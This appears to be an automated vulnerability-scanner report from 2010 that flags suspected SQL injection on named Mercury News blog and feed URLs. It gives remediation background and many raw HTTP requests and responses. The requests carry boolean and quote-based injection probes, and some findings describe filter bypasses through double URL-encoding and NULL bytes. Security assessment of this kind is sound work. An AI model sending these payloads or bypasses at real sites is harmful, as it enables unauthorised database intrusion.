SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.
Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Remediation background
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.
You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
One common defense is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defense is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defense may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defense to be bypassed.
Another often cited defense is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 3, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /aei/2010/12%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:12:24 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:12:24 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /aei/2010/12%2527%2527/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!-- Page not cached by WP Super Cache. No closing HTML tag. Check your theme. -->
1.2. http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 53405733%20or%201%3d1--%20 and 53405733%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d1--%20=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:09:14 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:09:16 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Database Error</title>
</head> <body> <h1>Error establishing a database connection</h1> </body> </html>
Request 2
GET /aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/?153405733%20or%201%3d2--%20=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! | A+E Interactive</title>
<meta name="generator" content="WordPress" /> <link rel="alternate" type="application/rss+xml" title="A+E Interactive » Charlie Brown vs. The Grinch; Round 3 of our Holiday TV Tourney has started; Vote now! Comments Feed" href="http://blogs.mercurynews.com/aei/2010/12/07/charlie-brown-vs-the-grinch-round-3-of-our-holiday-tv-tourney-has-started-vote-now/feed/" /> <link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/aei/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/aei/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/aei/wp-includes/wlwmanifest.xml" /> <link rel='index' title='A+E Interactive' href='http://blogs.mercurynews.com/aei' /> <link rel='start' title='A massive mea culpa and apology for a bad Mass Effect review' href='http://blogs.mercurynews.com/aei/2008/01/01/a_massive_mea_culpa_and_apology_for_a_bad_mass_effect_review/' /> <link rel='prev' title='Review: Leonard Cohen in Oakland' href='http://blogs.mercurynews.com/aei/2010/12/07/review-leonard-cohen-in-oakland/' /> <meta name="generator" content="WordPress 2.8.4" /> <meta name="descrip ...[SNIP]...
1.3. http://blogs.mercurynews.com/extrabaggs/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://blogs.mercurynews.com
Path:
/extrabaggs/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /extrabaggs/?1%00'=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:08:59 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:08:59 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /extrabaggs/?1%00''=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:12:25 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:12:26 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/ HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /extrabaggs/2010'/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:12:45 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:12:49 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /extrabaggs/2010''/12/06/sabean-giants-payroll-could-reach-120-million-in-2011/feed/ HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /kawakami%2527/?p=9831 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:13:10 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:13:12 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /kawakami%2527%2527/?p=9831 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Date: Tue, 07 Dec 2010 23:13:12 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Vary: Cookie X-Pingback: http://blogs.mercurynews.com/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:13:15 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Keep-Alive: timeout=15 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Content-Length: 7611
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org ...[SNIP]...
1.7. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://blogs.mercurynews.com
Path:
/sharks/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /sharks/?1%2527=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:09:07 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:09:07 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
Request 2
GET /sharks/?1%2527%2527=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http:// ...[SNIP]...
1.8. http://blogs.mercurynews.com/sharks/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://blogs.mercurynews.com
Path:
/sharks/
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /sharks/?p=4471&1%20and%201%3d1--%20=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:11:54 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:11:56 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Database Error</title>
</head> <body> <h1>Error establishing a database connection</h1> </body> </html>
Request 2
GET /sharks/?p=4471&1%20and%201%3d2--%20=1 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http://gmpg.org/xfn/11"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings | Working the Corners</title>
<meta name="generator" content="WordPress" /> <link rel="alternate" type="application/rss+xml" title="Working the Corners » Which goalie gets the start against Flyers? Maybe not as easy a call after 5-2 victory over Red Wings Comments Feed" href="http://blogs.mercurynews.com/sharks/2010/12/07/so-which-goalie-gets-the-start-against-flyers-may-not-be-an-easy-call-after-win-over-red-wings/feed/" /> <link rel='stylesheet' id='A2A_SHARE_SAVE-css' href='http://blogs.mercurynews.com/sharks/wp-content/plugins/add-to-any/addtoany.min.css?ver=1.3' type='text/css' media='' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://blogs.mercurynews.com/sharks/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://blogs.mercurynews.com/sharks/wp-includes/wlwmanifest.xml" /> <link rel='index' title='Working the Corners' href='http://blogs.mercurynews.com/sharks' /> <link rel='start' title='Finding teal connections in Prague' href='http://blogs.mercurynews.com/sharks/2007/09/24/finding-teal-connections-in-prague/' /> <link rel='prev' title='Talk about your turnaround — Sharks get revenge against Detroit, but coach still unhappy over start' href='http://blogs.mercurynews.com/sharks/2010/12/06/4464/' /> ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /warriors/?p=1744 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q='
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr"> <head profile="http:// ...[SNIP]... e things and, in fact, you can usually get signals that the coach is if he sits a player, other than to rest. Our lack of depth, especially a guard, makes that tough to do. But Smart does it when the errors are too much to ignore. Listen to “neutral” announcers in nationally telecast games or sometimes even in the other team’s feed, if you get a half-way honest announcer. You’ll ...[SNIP]...
Request 2
GET /warriors/?p=1744 HTTP/1.1 Host: blogs.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Referer: http://www.google.com/search?hl=en&q=''
Response 2
HTTP/1.1 500 Internal Server Error Date: Tue, 07 Dec 2010 23:13:55 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Expires: Wed, 11 Jan 1984 05:00:00 GMT Last-Modified: Tue, 07 Dec 2010 23:13:57 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Content-Length: 358 Connection: close Content-Type: text/html; charset=utf-8
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" > <head> <meta http-equiv="Content- ...[SNIP]...
The REST URL parameter 3 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 3. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet'%20and%201%3d1--%20/568/200125.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:18:26 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet'%20and%201%3d2--%20/568/200125.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:18:26 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi'%20and%201%3d1--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 404 Not Found Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Pragma: no-cache Content-Type: text/html Cache-Control: no-cache Expires: Tue, 07 Dec 2010 23:20:07 GMT Date: Tue, 07 Dec 2010 23:20:07 GMT Content-Length: 424 Connection: close
<HTML> <!-- This file is for Error code #404 - Not Found --> <HEAD> <TITLE>Not Found (404)</TITLE> </HEAD>
<BODY BGCOLOR="#eeeeff"> <H1>Not Found (404)</H1>
The file that you requested could not be found on this server. If you provided the URL, please check to ensure that it is correct. If you followed a hypermedia link, please notify the administrator of that server of this error. </BODY></HTML>
Request 2
GET /mngi'%20and%201%3d2--%20/rss/CustomRssServlet/568/200222.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:08 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
<h1>The page cannot be found</h1> The page you are looking for might have been removed, had its name changed, or is temporarily unavailable. <hr> <p>Please try the following:</p> <ul> <li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li> <li>If you reached this page by clicking a link, contact the Web site administrator to alert them that the link is incorrectly formatted. </li> <li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li> </ul> <h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2> <hr> <p>Technical Information (for support personnel)</p> <ul> <li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li> <li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr), and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li> </ul>
The REST URL parameter 4 appears to be vulnerable to SQL injection attacks. The payloads 67192433%20or%201%3d1--%20 and 67192433%20or%201%3d2--%20 were each submitted in the REST URL parameter 4. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d1--%20/200222.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 1
HTTP/1.1 200 OK Server: Microsoft-IIS/5.0 X-ATG-Version: ATGPlatform/7.1p1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ] Content-Type: text/html Date: Tue, 07 Dec 2010 23:20:18 GMT Content-Length: 0 Connection: close
Request 2
GET /mngi/rss/CustomRssServlet/56867192433%20or%201%3d2--%20/200222.xml HTTP/1.1 Host: feeds.mercurynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response 2
HTTP/1.1 404 Not Found Content-Length: 1635 Content-Type: text/html Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Date: Tue, 07 Dec 2010 23:20:19 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <HTML><HEAD><TITLE>The page cannot be found</TITLE> <META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252"> <STYLE type="text/css"> BODY { font: 8pt/12pt verdana } H1 { font: 13pt/15pt verdana } H2 { font: 8pt/12pt verdana } A:link { color: red } A:visited { color: maroon } </STYLE> </HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>
